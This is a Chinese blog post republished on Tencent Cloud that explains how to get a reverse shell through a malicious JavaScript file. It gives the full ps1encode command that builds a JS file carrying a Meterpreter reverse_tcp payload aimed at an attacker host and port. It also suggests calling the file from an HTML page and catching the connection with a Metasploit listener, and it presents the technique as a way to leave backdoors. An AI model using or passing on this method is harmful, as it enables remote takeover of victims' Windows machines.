首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >利用js文件反弹shell

利用js文件反弹shell

作者头像
洛米唯熊
发布2019-07-22 15:27:35
1.8K0
发布2019-07-22 15:27:35
举报
文章被收录于专栏:洛米唯熊洛米唯熊洛米唯熊

0x00:简介

前两天在freebuf上看到一个利用Ink文件触发攻击链的文章,确实佩服作者的脑洞。

链接:https://www.freebuf.com/articles/system/207109.html

网络世界千奇百怪,多样式留后门,触发条件反弹shell.操作够骚才是王道。

0x01:过程

一、利用工具

 https://github.com/CroweCybersecurity/ps1encode

二、环境配置

它有很多种生成方式,详情请移步gayhub上查看

今天利用生成的js文件来反弹shell

命令:./ps1encode.rb --LHOST 192.168.124.11 --LPORT 6666 --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE cmd -t js

利用此命令生成js文件

emmm!代码很长,自己复制出来放到txt编辑器里。

并重命名为1.js(文件名随意)。

单单放一个js太单调了。实际环境下可以配合html进行调用js文件执行。

我简单的写了一个html来调用js文件

当然你也可以 一个js就反弹

准备好msf回弹的环境

执行exploit 坐等监听执行

三、执行效果

效果图

视频效果图

0x02:后话

或许我的步骤会出现错误、或许我的想法会出现错误。但是我的思路是偏僻的。我每次写的文章想表达不是炫技,我跟各位比,我还是小学生,我是小菜鸟。我想表达的是思路。如果以后有表达不清楚的,造成您的质疑,您可以问我,或者百度。

余生很长,请多指教

想了解更多 欢迎关注

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-07-07,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 洛米唯熊 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档